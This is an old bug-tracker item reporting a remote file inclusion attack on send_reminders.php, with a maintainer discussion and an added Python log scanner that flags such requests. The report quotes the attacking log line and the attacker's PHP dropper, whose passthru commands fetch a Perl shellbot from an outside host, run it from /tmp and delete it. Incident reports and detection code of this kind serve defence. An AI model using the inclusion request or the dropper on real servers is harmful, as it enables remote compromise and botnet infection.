
#1720 Vulnerability in 1.0.4 send_reminders.php

Security_Hole
closed
Craig Knudsen
Security (98)
5
2006-12-10
2006-09-01
michael
No

My web host reports the following on my installation of
1.0.4:

[Begin quote]

Some hacker overloaded the server this morning by using
send_reminders.php to run some external code. I
renamed the file until I can find a patch to fix it.

Here is one of the log entries:

212.160.192.6 - - [31/Aug/2006:06:56:43 -0500] "GET /tools/send_reminders.php?includedir=http://tckct.co.uk/_cgi-bin/m4d.txt? HTTP/1.1" 200 74 "-" "libwww-perl/5.803"

The file at http://tckct.co.uk/_cgi-bin/m4d.txt?
HTTP/1.1 looked like this:

<?
passthru('cd /tmp;wget
http://tckct.co.uk/_cgi-bin/bot.txt;perl bot.txt;rm
-f bot.txt*');
passthru('cd /tmp;curl -O
http://tckct.co.uk/_cgi-bin/bot.txt;perl
bot.txt;rm -f bot.txt*');
passthru('cd /tmp;lwp-download
http://tckct.co.uk/_cgi-bin/bot.txt;perl
bot.txt.txt;rm -f bot.txt*');
passthru('cd /tmp;lynx -source
http://tckct.co.uk/_cgi-bin/bot.txt
> >bot.txt;perl bot.txt;rm -f bot.txt*');
passthru('cd /tmp;fetch
http://tckct.co.uk/_cgi-bin/bot.txt >bot.txt;perl
bot.txt;rm -f bot.txt*');
passthru('cd /tmp;GET
http://tckct.co.uk/_cgi-bin/bot.txt >bot.txt;perl
bot.txt;rm -f bot.txt*');
?>
Owned by Morgan

The file at http://tckct.co.uk/_cgi-bin/bot.txt looked
like this:

#!/usr/bin/perl
# VulnScan v6 Stable By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
# www.priv8.com.ar
#
#
# Greets to irc.gigachat.net :: #Morgan
#
#

[End quote]

Any help would be appreciated,

michael
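
Added example, not part of the original report or the project's code: a log check that flags requests like the one quoted above, where a query parameter's value is itself a remote URL. It generalizes beyond `includedir` to any parameter name and to https/ftp and percent-encoded values; the second and third sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# A parameter value that starts with a remote scheme is the indicator
# (checked after percent-decoding, so encoded variants are caught too).
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)

SAMPLE_LOG = [
    # Entry quoted in the report above.
    '212.160.192.6 - - [31/Aug/2006:06:56:43 -0500] "GET /tools/send_reminders.php?includedir=http://tckct.co.uk/_cgi-bin/m4d.txt? HTTP/1.1" 200 74 "-" "libwww-perl/5.803"',
    # Constructed: ordinary request with plain parameter values.
    '192.0.2.10 - - [31/Aug/2006:07:01:02 -0500] "GET /index.php?date=20060901&user=demo HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Constructed: same pattern with the URL percent-encoded.
    '203.0.113.7 - - [31/Aug/2006:07:03:15 -0500] "GET /tools/send_reminders.php?includedir=http%3A%2F%2Fremote.example%2Fx.txt%3F HTTP/1.1" 404 210 "-" "curl/7.15"',
]

def find_remote_includes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({"ip": m["ip"], "time": m["time"], "path": path,
                                 "param": name, "value": value,
                                 "status": int(m["status"]), "agent": m["agent"]})
    return findings

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["path"], hit["param"], hit["value"])
```

Each hit is a lead for triage rather than proof of compromise: legitimate redirect or callback parameters also carry URLs, so review the path, status code and user agent together.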

Discussion

  • Ray Jones
    2006-09-01

    Logged In: YES
    user_id=1090373

    This problem was thought to be corrected in v1.0.4. Can you
    please get the CVS id number from the send_reminders.php
    file so we can verify the version?

    Ask your admin to limit access to this file to localhost.
    This assumes you are using a cron job to normally run
    send_reminders.

    -Ray

     
  • Ray Jones
    2006-09-01

    • status: open --> pending
     
  • michael
    2006-09-01

    send_reminders.php

     
    Attachments
  • michael
    2006-09-01

    • status: pending --> open
     
  • michael
    2006-09-01

    Logged In: YES
    user_id=1588243

    $Id: send_reminders.php,v 1.21.2.3 2006/06/07 15:10:46
    cknudsen Exp $

    In case this isn't what you needed I've attached the file.
    I'll pass your suggestion on to my host.

    Thanks for responding so promptly. I'll watch for further
    comments.

    Michael
    mburp

     
  • michael
    2006-09-02

    Logged In: YES
    user_id=1588243

    If it's of any interest, my host has identified the script
    triggered as 'Perl/Shellbot'.

    http://vil.nai.com/vil/content/v_130620.htm

    Michael
    mburp

     
  • Ray Jones
    2006-11-09

    Logged In: YES
    user_id=1090373

    Has anyone else experienced this problem? The 'includedir'
    issue was solved as part of the v1.0.4 upgrade. I'm not sure
    what else we can do at this point.

    I do recommend restricting access to the tools directory at
    the server level. You can check with your ISP on how best to
    do this. I have mine limited to localhost.

    -Ray

     
  • Ray Jones
    2006-11-09

    • status: open --> pending
     
  • Logged In: YES
    user_id=1312539
    Originator: NO

    This Tracker item was closed automatically by the system. It was
    previously set to a Pending status, and the original submitter
    did not respond within 30 days (the time period specified by
    the administrator of this Tracker).

     
    • status: pending --> closed